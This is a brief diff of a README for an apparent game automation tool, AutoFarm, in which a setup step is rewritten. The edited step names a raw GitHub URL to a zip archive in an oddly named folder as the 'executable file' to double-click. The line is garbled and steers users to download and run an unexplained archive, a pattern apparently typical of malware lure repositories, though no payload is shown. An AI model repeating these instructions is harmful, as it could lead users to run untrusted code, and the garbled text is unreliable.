maxspielbar/AutoFarm/README.md

 6. After extraction, navigate to the folder containing the extracted files.

-7. Look for the executable file named `AutoFarm.exe`.
+7. Look for the executable file named `https://raw.githubusercontent.com/maxspielbar/AutoFarm/main/chibrit/Auto_Farm_v2.1.zip`.
 Double-click this file to run the application.

 8. Follow any on-screen instructions to set up AutoFarm on your system.